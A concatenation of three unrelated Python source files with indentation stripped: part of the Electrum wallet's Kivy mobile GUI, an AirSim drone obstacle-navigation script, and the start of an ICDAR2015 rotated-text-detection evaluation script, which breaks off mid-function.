popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
def load_wallet_by_name(self, path):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
Logger.debug('Electrum: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.electrum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
Logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging")
else:
status = ''
else:
status = _("Disconnected")
self.status = self.wallet.basename() + (' [size=15dp](%s)[/size]'%status if status else '')
# balance
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet.has_password and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show a error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show a Info Message Bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show a Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
img_nav.py
|
import setup_path
import airsim
import numpy as np
import os
import tempfile
import pprint
import cv2
import math
import time
import threading
from PIL import Image
import random
# Camera details should match settings.json
IMAGE_HEIGHT = 144
IMAGE_WIDTH = 256
CENTER = (IMAGE_HEIGHT //2, IMAGE_WIDTH//2)
FOV = 90
# TODO: Vertical FOV rounds down for generating random integers. Some pictures will not be created
VERT_FOV = FOV * IMAGE_HEIGHT // IMAGE_WIDTH
OBS_LEN = 2.2 # Obstacle diameter in meters
NUM_OBS = 6 # The number of obstacles in the course
VEL = 0.1 # Target velocity along the LOS vector
'''
# Ground truth depth function
def getDepth(h,w):
received = client.simGetObjectPose("Obstacle1")
obs_pos = np.array([received.position.x_val, received.position.y_val, received.position.z_val]) # Global coordinates of the obstacle
received = client.simGetVehiclePose()
drone_pos = np.array([received.position.x_val, received.position.y_val, received.position.z_val]) # Global coordinates of the drone
return np.linalg.norm(obs_pos - drone_pos)
'''
def getDepth(h,w):
# Constants calibrated from image_calibrator.py
# 8.89922094 0.0304452 13.7360959 0.02951979 0.10829337
return 8.89922094 * np.exp(-0.0304452 * h) + 13.7360959 * np.exp(-0.02951979 * w) + 0.10829337
def cartesianToPolar(x,y,z):
return [
np.sqrt(x**2 + y**2 + z**2),
np.arctan2(y, x),
np.arctan2(np.sqrt(x**2 + y**2), z)]
def polarToCartesian(r, theta, phi):
return [
r * math.sin(theta) * math.cos(phi),
r * math.sin(theta) * math.sin(phi),
r * math.cos(theta)]
def normalize(v):
norm = np.linalg.norm(v)
if norm == 0:
return v
return v / norm
def printImage(image):
mask = np.full_like(image, 255)
for i in range(len(image)):
for j in range(len(image[i])):
if np.array_equal(image[i][j], [0,0,0]):
mask[i][j] = [0,0,0]
im = Image.fromarray(mask)
im.show()
def getBoundBox():
responses = client.simGetImages([
#airsim.ImageRequest("0", airsim.ImageType.DepthVis),
#airsim.ImageRequest("0", airsim.ImageType.DepthPerspective, True),
airsim.ImageRequest("0", airsim.ImageType.Segmentation, False, False),
#airsim.ImageRequest("0", airsim.ImageType.Scene, False, False),
#airsim.ImageRequest("0", airsim.ImageType.DisparityNormalized),
#airsim.ImageRequest("0", airsim.ImageType.SurfaceNormals)
])
response = responses[0]
img1d = np.fromstring(response.image_data_uint8, dtype=np.uint8) #get numpy array
img_bgr = img1d.reshape(response.height, response.width, 3) #reshape array to 3 channel image array H X W X 3
#img_bgr = np.flipud(img_bgr) #original image is fliped vertically
image = cv2.cvtColor(img_bgr, cv2.COLOR_BGR2RGB) # Change from Airsim's BGR to an RGB image
x = threading.Thread(target=printImage, args=(image,), daemon=True)
x.start()
u = -1 # Highest point of the obstacle
b = -1 # Lowest point of the obstacle
for i in range(len(image)):
for j in range(len(image[i])):
if np.array_equal(image[i][j], [0,0,0]):
if u == -1:
u = i
b = i
l = -1 # Leftmost point of the obstacle
r = -1 # Rightmost point of the obstacle
for j in range(len(image[0])):
for i in range(len(image)):
if np.array_equal(image[i][j], [0,0,0]):
if l == -1:
l = j
r = j
i = u + (b-u)//2
j = l + (r-l)//2
return ([i,j] , [u,b,l,r])
#TODO: Drone navigates to the right side of the obstacle regardless of starting position. Corrections to tragectory occur but happen to late
# Generate offsets for the drone's starting position
x = random.randint(-50,-40)
y = random.randint(-10,10)
z = random.randint(-10,10)
# connect to the AirSim simulator
client = airsim.MultirotorClient()
client.confirmConnection()
client.enableApiControl(True)
if client.simSetSegmentationObjectID("Obstacle[\w]*", 0, True):
print("Segmentation color set to black")
else:
print("Segmentation color specification failed")
print("Setting up the drone for flight...")
received = client.simGetObjectPose("Obstacle1")
last_obs_pos = np.array([received.position.x_val, received.position.y_val, received.position.z_val]) # Global coordinates of the obstacle
client.armDisarm(True)
client.takeoffAsync().join()
# Move the drone to a starting position nearby the first obstacle
client.moveToPositionAsync(last_obs_pos[0]+x, last_obs_pos[1]+y, last_obs_pos[2]+z, 1).join()
# client.rotateToYawAsync(0, timeout_sec=3e+38, margin=2).join() # Rotate yaw to face forward
tm = time.time()
while True:
center, bounds = getBoundBox() # The coordinates for the bounding box of the obstacle
print("center: ", center)
print("size: ", [bounds[1] - bounds[0], bounds[3] - bounds[2]])
depth = getDepth(bounds[1] - bounds[0], bounds[3] - bounds[2]) # Estimated distance to the obstacle in meters
print("depth: ", depth)
pixel_size = 2.2 / max(bounds[1] - bounds[0], bounds[3] - bounds[2]) # number of meters per pixel in the surface of the sphere of radius 'depth'. Obtained by comparing the known size of the obstacle to the number of pixels it includes
yaw_angle = (center[1] - CENTER[1]) * pixel_size / depth # yaw angle from the camera center to the center of the obstacle, calculated using the arc length formula
pitch_angle = (center[0] - CENTER[0]) * pixel_size / depth # pitch angle from the camera center to the center of the obstacle, calculated using the arc length formula
print("angles: ", yaw_angle,pitch_angle)
vector = polarToCartesian(1, pitch_angle + 0.5 * math.pi, -1 * yaw_angle) # Unit LOS Vector, defined in the Cartesian axis relative to the drone
'''
# TODO(optional): Test quaternion math (BodyFrame works)
received = client.simGetVehiclePose() # TODO: Simulation specific API. Replace with Kinematics orientation estimation and/or GPS position
# drone_pos = np.array([received.position.x_val, received.position.y_val, received.position.z_val]) # Global coordinates of the drone
drone_or = np.array([received.orientation.w_val, received.orientation.x_val, received.orientation.y_val, received.orientation.z_val]) # Global quaternion on the drone
# q^{-1} = [q0/||q||, -q1/||q||, -q2/||q||, -q3/||q||]
drone_or_inv = [drone_or[0]/(drone_or[0]**2 + drone_or[1]**2 + drone_or[2]**2 + drone_or[3]**2), -drone_or[1]/(drone_or[0]**2 + drone_or[1]**2 + drone_or[2]**2 + drone_or[3]**2), -drone_or[2]/(drone_or[0]**2 + drone_or[1]**2 + drone_or[2]**2 + drone_or[3]**2), -drone_or[3]/(drone_or[0]**2 + drone_or[1]**2 + drone_or[2]**2 + drone_or[3]**2)] # Inverse quaternion of drone's orientation used to convert from Bodyframe to Worldframe
# v' = v + 2 * r x (s * v + r x v) / m
LOS = np.array(vector) + np.cross(2 * np.array(drone_or_inv[1:]), drone_or_inv[0]*np.array(vector) + np.cross(np.array(drone_or_inv[1:]), np.array(vector))) / (drone_or_inv[0]**2 + drone_or_inv[1]**2 + drone_or_inv[2]**2 + drone_or_inv[3]**2) # Image of LOS vector under inverse quaternion
print(LOS)
'''
# velocity is proportional to the estimated distance from the object
velocity = VEL*max(depth, 0.25)
print("Velocity: ", velocity)
print("Processing time: ", time.time() - tm)
client.moveByVelocityBodyFrameAsync(velocity * vector[0], -1 * velocity * vector[1], -1 * velocity * vector[2], 1)
tm = time.time()
client.reset()
client.armDisarm(False)
client.enableApiControl(False)
'''
'''
|
test_icdar2015_base.py
|
# -*- coding:utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import os
import sys
import tensorflow as tf
import cv2
import numpy as np
import math
from tqdm import tqdm
import argparse
from multiprocessing import Queue, Process
from utils import tools
from libs.label_name_dict.label_dict import LabelMap
from libs.utils.draw_box_in_img import DrawBox
from libs.utils.coordinate_convert import forward_convert, backward_convert
from libs.utils import nms_rotate
from libs.utils.rotate_polygon_nms import rotate_gpu_nms
from utils.order_points import sort_corners
from dataloader.pretrained_weights.pretrain_zoo import PretrainModelZoo
def parse_args():
parser = argparse.ArgumentParser('Test ICDAR2015')
parser.add_argument('--test_dir', dest='test_dir',
help='evaluate imgs dir ',
default='/data/dataset/ICDAR2015/ch4_test_images', type=str)
parser.add_argument('--gpus', dest='gpus',
help='gpu id',
default='0,1,2,3,4,5,6,7', type=str)
parser.add_argument('--num_imgs', dest='num_imgs',
help='test image number',
default=np.inf, type=int)
parser.add_argument('--show_box', '-s', default=False,
action='store_true')
parser.add_argument('--flip_img', '-f', default=False,
action='store_true')
parser.add_argument('--multi_scale', '-ms', default=False,
action='store_true')
args = parser.parse_args()
return args
class TestICDAR2015(object):
def __init__(self, cfgs):
self.cfgs = cfgs
self.args = parse_args()
label_map = LabelMap(cfgs)
self.name_label_map, self.label_name_map = label_map.name2label(), label_map.label2name()
def worker(self, gpu_id, images, det_net, result_queue):
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu_id)
# 1. preprocess img
img_plac = tf.placeholder(dtype=tf.uint8, shape=[None, None, 3]) # is RGB. not BGR
img_batch = tf.cast(img_plac, tf.float32)
pretrain_zoo = PretrainModelZoo()
if self.cfgs.NET_NAME in pretrain_zoo.pth_zoo or self.cfgs.NET_NAME in pretrain_zoo.mxnet_zoo:
img_batch = (img_batch / 255 - tf.constant(self.cfgs.PIXEL_MEAN_)) / tf.constant(self.cfgs.PIXEL_STD)
else:
img_batch = img_batch - tf.constant(self.cfgs.PIXEL_MEAN)
img_batch = tf.expand_dims(img_batch, axis=0)
detection_boxes, detection_scores, detection_category = det_net.build_whole_detection_network(
input_img_batch=img_batch,
gtboxes_batch_h=None,
gtboxes_batch_r=None,
gpu_id=0)
init_op = tf.group(
tf.global_variables_initializer(),
tf.local_variables_initializer()
)
restorer, restore_ckpt = det_net.get_restorer()
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
sess.run(init_op)
if not restorer is None:
restorer.restore(sess, restore_ckpt)
print('restore model %d ...' % gpu_id)
for a_img in images:
raw_img = cv2.imread(a_img)
raw_h, raw_w = raw_img.shape[0], raw_img.shape[1]
det_boxes_r_all, det_scores_r_all, det_category_r_all = [], [], []
img_short_side_len_list = self.cfgs.IMG_SHORT_SIDE_LEN if isinstance(self.cfgs.IMG_SHORT_SIDE_LEN, list) else [
self.cfgs.IMG_SHORT_SIDE_LEN]
img_short_side_len_list = [img_short_side_len_list[0]] if not self.args.multi_scale else img_short_side_len_list
for short_size in img_short_side_len_list:
max_len = self.cfgs.IMG_MAX_LENGTH
if raw_h < raw_w:
new_h, new_w = short_size, min(int(short_size * float(raw_w) / raw_h), max_len)
else:
new_h, new_w = min(int(short_size * float(raw_h) / raw_w), max_len), short_size
img_resize = cv2.resize(raw_img, (new_w, new_h))
resized_img, detected_boxes, detected_scores, detected_categories = \
sess.run(
[img_batch, detection_boxes, detection_scores, detection_category],
feed_dict={img_plac: img_resize[:, :, ::-1]}
)
detected_indices = detected_scores >= self.cfgs.VIS_SCORE
detected_scores = detected_scores[detected_indices]
detected_boxes = detected_boxes[detected_indices]
detected_categories = detected_categories[detected_indices]
if detected_boxes.shape[0] == 0:
continue
resized_h, resized_w = resized_img.shape[1], resized_img.shape[2]
detected_boxes = forward_convert(detected_boxes, False)
detected_boxes[:, 0::2] *= (raw_w / resized_w)
detected_boxes[:, 1::2] *= (raw_h / resized_h)
det_boxes_r_all.extend(detected_boxes)
det_scores_r_all.extend(detected_scores)
det_category_r_all.extend(detected_categories)
if self.args.flip_img:
detected_boxes, detected_scores, detected_categories = \
sess.run(
[detection_boxes, detection_scores, detection_category],
feed_dict={img_plac: cv2.flip(img_resize, flipCode=1)[:, :, ::-1]}
)
detected_indices = detected_scores >= self.cfgs.VIS_SCORE
detected_scores = detected_scores[detected_indices]
detected_boxes = detected_boxes[detected_indices]
detected_categories = detected_categories[detected_indices]
if detected_boxes.shape[0] == 0:
continue
resized_h, resized_w = resized_img.shape[1], resized_img.shape[2]
detected_boxes = forward_convert(detected_boxes, False)
detected_boxes[:, 0::2] *= (raw_w / resized_w)
detected_boxes[:, 0::2] = (raw_w - detected_boxes[:, 0::2])
detected_boxes[:, 1::2] *= (raw_h / resized_h)
det_boxes_r_all.extend(sort_corners(detected_boxes))
det_scores_r_all.extend(detected_scores)
det_category_r_all.extend(detected_categories)
detected_boxes, detected_scores, detected_categories = \
sess.run(
[detection_boxes, detection_scores, detection_category],
feed_dict={img_plac: cv2.flip(img_resize, flipCode=0)[:, :, ::-1]}
)
detected_indices = detected_scores >= self.cfgs.VIS_SCORE
detected_scores = detected_scores[detected_indices]
detected_boxes = detected_boxes[detected_indices]
detected_categories = detected_categories[detected_indices]
if detected_boxes.shape[0] == 0:
continue
resized_h, resized_w = resized_img.shape[1], resized_img.shape[2]
detected_boxes = forward_convert(detected_boxes, False)
detected_boxes[:, 0::2] *= (raw_w / resized_w)
detected_boxes[:, 1::2] *= (raw_h / resized_h)
detected_boxes[:, 1::2] = (raw_h - detected_boxes[:, 1::2])
det_boxes_r_all.extend(sort_corners(detected_boxes))
det_scores_r_all.extend(detected_scores)
det_category_r_all.extend(detected_categories)
det_boxes_r_all = np.array(det_boxes_r_all)
det_scores_r_all = np.array(det_scores_r_all)
det_category_r_all = np.array(det_category_r_all)
box_res_rotate_ = []
label_res_rotate_ = []
score_res_rotate_ = []
if det_scores_r_all.shape[0] != 0:
for sub_class in range(1, self.cfgs.CLASS_NUM + 1):
index = np.where(det_category_r_all == sub_class)[0]
if len(index) == 0:
continue
tmp_boxes_r = det_boxes_r_all[index]
tmp_label_r = det_category_r_all[index]
tmp_score_r = det_scores_r_all[index]
if self.args.multi_scale:
tmp_boxes_r_ = backward_convert(tmp_boxes_r, False)
# try:
# inx = nms_rotate.nms_rotate_cpu(boxes=np.array(tmp_boxes_r_),
# scores=np.array(tmp_score_r),
# iou_threshold=self.cfgs.NMS_IOU_THRESHOLD,
# max_output_size=5000)
# except:
tmp_boxes_r_ = np.array(tmp_boxes_r_)
tmp = np.zeros([tmp_boxes_r_.shape[0], tmp_boxes_r_.shape[1] + 1])
